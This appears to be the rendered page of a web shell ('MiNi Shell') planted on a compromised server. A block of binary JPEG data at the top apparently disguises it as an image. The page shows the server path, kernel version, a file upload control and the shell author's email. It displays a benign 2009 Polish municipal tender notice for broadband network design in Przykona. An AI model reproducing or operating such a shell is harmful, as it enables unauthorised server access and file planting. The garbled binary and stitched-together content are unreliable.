JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090420/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090420/64081-N-2009.html

<p class="kh_header"><b>Przykona: Opracowanie koncepcji i dokumentacji technicznej na zadanie pn. Projekt e-gmina - szerokopasmowy dostęp do internetu</b><br>
<b>Numer ogłoszenia: 64081 - 2009; data zamieszczenia: 20.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Przykona , ul. Szkolna 7, 62-731 Przykona, woj. wielkopolskie, tel. 063 2791010, faks 063 2791022.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.przykona.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie koncepcji i dokumentacji technicznej na zadanie pn. Projekt e-gmina - szerokopasmowy dostęp do internetu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego postępowania jest Opracowanie koncepcji i dokumentacji technicznej na zadanie pn. Projekt e-gmina - szerokopasmowy dostęp do internetu  

Przedmiot zamówienia obejmuje:
1.	Przedmiotem zamówienia jest wykonanie koncepcji i pełnej dokumentacji technicznej sieci bezprzewodowego dostępu do Internetu dla mieszkańców gminy Przykona. Projekt sieci, powinien zostać poprzedzony rzetelnymi pomiarami zajętości częstotliwości radiowych dla zastosowanych technologii w celu określenia optymalnych kanałów pracy dla poszczególnych nadajników. Należy przeprowadzić również badania gruntów lub obiektów, na których przewiduje się instalację stacji nadawczych biorąc pod uwagę również ilość potencjalnych klientów w jego otoczeniu. Ilość oraz rozmieszczenie nadajników powinna być taka, aby obszar pokryty zasięgiem sieci obejmował całą gminę (obszary mieszkalne).
2.	Dokumentacja techniczna stacji nadawczych powinna zawierać następujące informacje:
2.1	Rodzaj zastosowanych masztów użytych w każdym punkcie nadawczym wraz z jego wszystkimi danymi technicznymi takimi jak wymiary, waga, wytrzymałość na ciężar oraz opór na wiatr, sposób instalacji oraz techniką montażu
2.2 Rodzaj oraz dokładne parametry zastosowanych anten wraz z opisem ich 
      funkcjonalności dla działania sieci. Należy udokumentować, iż taki a nie inny 
      podział anten spełni swoją rolę w budowie sieci zarówno pod katem pokrycia 
      obszaru jak i wydajności  
2.3 Schemat sieci zawierający szczegółowy opis połączeń pomiędzy stacjami  
      nadawczymi, system realizowania tych połączeń, zastosowane technologie 
      wraz z udokumentowaniem wydajności tych technologii dla poprawnego   
     realizowania założeń sieci. Dokument ten powinien zawierać dokładny 
     schemat stacji nadawczych na mapie gminy, informację o rodzajach anten i ich 
     obszarach promieniowania oraz opis funkcji, jaka dany link będzie pełnił w  
     sieci
2.4 Szczegółowy opis techniczny użytych urządzeń na każdej stacji nadawczej  
      zawierającej rodzaj zastosowanego urządzenia, markę oraz model urządzenia 
      jak i opis funkcji, które dane urządzenie będzie pełniło w sieci. W dokumencie 
       tym należy także opisać system operacyjny pod kontrola, którego pracować 
       będzie dane urządzenia wraz ze skryptami konfiguracyjnymi na wypadek 
       konieczności wymiany urządzenia po awarii. 
2.5	Schemat wykonania instalacji urządzeń na każdej stacji nadawczej 
       uwzględniający sposób połączenia urządzeń, system przeprowadzania 
       okablowania oraz system zasilania urządzeń z uwzględnieniem zasilania 
       awaryjnego 
2.6	Projektując sieć należy skonsultować z Zamawiającym lokalizację 
      przewidzianych stacji nadawczych.
3.	Dokumentacja powinna zawierać szczegółowy opis procedury podłączania klientów do sieci wraz z podaniem listy kompatybilnych urządzeń klienckich oraz opisem ich konfiguracji do współpracy z siecią. Należy tutaj przedstawić dokładną listę elementów wchodzących w skład urządzania klienckiego, opis ich podłączenia oraz konfiguracji urządzeń
4.	Jeżeli system użyty do budowy sieci wymagał będzie od strony użytkownika jakiejkolwiek konfiguracji komputera w celu uruchomienia połączenia internetowego - należy przedstawić szczegółową instrukcji postępowania w celu uruchomienia połączenia internetowego u klienta. 
5.	Dokumentację należy wykonać w 3 egzemplarzach i winna ona zwierać:
a). przedmiar robót  - 1 egzemplarz
b). kosztorys inwestorski - 1 egzemplarz 
c). specyfikacja techniczna 1 egzemplarz
Dokumentacja winna być wykonana zgodnie z obowiązującymi w tym przedmiocie  przepisami.
Dokumentacja winna być sporządzona w wersji papierowej i elektronicznej (PDF i WORD)..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 74.42.00.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> OPIS WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW
W przetargu mogą wziąć udział Wykonawcy, którzy:
a)	spełniają warunki określone w art. 22 ust. 1 ustawy Prawo Zamówień Publicznych 
b)	wykonają zamówienie w terminie do 31 lipca 2009r.
c)	spełniają wymogi określone w specyfikacji istotnych warunków zamówienia.
d)	nie podlegają wykluczeniu z postępowania zgodnie z art. 24 ust.1 i 2 w/w ustawy
e)	spełniają warunki udziału w postępowaniu zgodnie z art. 44  w/w ustawy
f)	posiadają uprawnienia do wykonywania określonej działalności 
g)	posiadają niezbędną wiedzę i doświadczenie do wykonania zamówienia
h)	posiadają niezbędny potencjał techniczny do wykonania zamówienia
i)	posiadają ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej

Sposób dokonywania oceny spełnienia tych warunków:
Ocena spełniania warunków wymaganych od Wykonawcy zostanie dokonana wg formuły: 
spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> WYKAZ OŚWIADCZEŃ I DOKUMENTÓW  JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIENIA WARUNKÓW UDZIAŁU  W POSTĘPOWANIU:
1.Wypełniony formularz ofertowy wg załączonego druku - Załącznik Nr 1.
2. Oświadczenie zgodnie z art. 24 ust.1 w/w ustawy - Załącznik Nr 2. 

W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych zamawiający żąda, następujących dokumentów:

        a). koncesji, zezwolenia, uprawnień do projektowania lub licencji, jeżeli ustawy nakładają obowiązek 
            posiadania koncesji, zezwolenia, uprawnień do projektowania lub licencji na podjęcie działalności 
           gospodarczej w zakresie objętym niniejszym zamówieniem publicznym, potwierdzone dokumentem 
     stwierdzającym posiadanie aktualnego wpisu na listę członków właściwej izby samorządu 
    zawodowego (jeżeli odpowiednie przepisy tego wymagają).
b). aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie  do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu  do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert
c). zaświadczenie właściwego urzędu skarbowego oraz właściwego oddziału Zakładu  Ubezpieczeń 
     Społecznych potwierdzających odpowiednio, że dostawca lub wykonawca nie zalega z opłacaniem 
     podatków, opłat oraz składek na ubezpieczenie zdrowotne lub  społeczne, lub zaświadczeń, że 
     uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie 
    w całości wykonania decyzji organu podatkowego  - wystawionych nie wcześniej niż 3 miesiące  
    przed upływem terminu składania ofert
3. Oświadczenie zgodnie art. 24  ust. 2 w/w ustawy   -   Załącznik Nr 3. 

4. Oświadczenie zgodnie z art. 22 ust.1 w/w ustawy - Załącznik Nr 4. 

W celu potwierdzenia opisanego przez zamawiającego warunku posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, zamawiający żąda, następujących dokumentów:
a)	wykazu wykonanych prac projektowych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - to w tym okresie, odpowiadających swoim rodzajem i wartością robotom stanowiącym przedmiot zamówienia w ilości minimum 3 (trzy),  z podaniem ich wartości, przedmiotu, daty i miejsca wykonania oraz załączenia dokumentów (referencje) potwierdzających, że te usługi zostały wykonane należycie - Załącznik Nr 5.  

b). wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia a także zakresu wykonywanych 
     przez nich czynności (Zamawiający wymaga udokumentowania posiadania stosownych uprawnień 
     przez te osoby odpowiednich do charakteru i zakresu prac określonych niniejszym zamówieniem 
     oraz w przypadku istnienia takiego wymogu, posiadania aktualnego wpisu na listę członków 
     właściwej izby samorządu zawodowego) -   Załącznik Nr 6.  

b)	wykaz niezbędnego do wykonania zamówienia sprzętu, narzędzi i urządzeń - Załącznik Nr 7.  

W celu potwierdzenia sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia przez Wykonawcę, Zamawiający żąda, następujących dokumentów:

- jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na sumę ubezpieczenia nie mniejszą niż 10 000 PLN.

Dokumenty są składane w formie oryginału lub kopii poświadczonej za zgodność 
z oryginałem przez osobę/osoby uprawnione do składania oferty

5. Oświadczenie o spełnieniu warunków udziału w postępowaniu zgodnie z art. 44  w/w     ustawy - Załącznik Nr 8.  
6.Wykaz zakresu zamówienia, którego wykonanie wykonawca zamierza powierzyć podwykonawcy - Załącznik Nr 9.    

7. Oferta cenowa 

8. Podpisany projekt umowy. 

Dokumenty są składane w formie oryginału lub kopii poświadczonej za zgodność 
z oryginałem przez osobę/osoby uprawnione do składania oferty..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.przykona.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Przykona, ul. Szkolna 7, 62-731 Przykona.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.05.2009 godzina 10:00, miejsce: Urząd Gminy Przykona, ul. Szkolna 7, 62-731 Przykona, punkt informacji.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com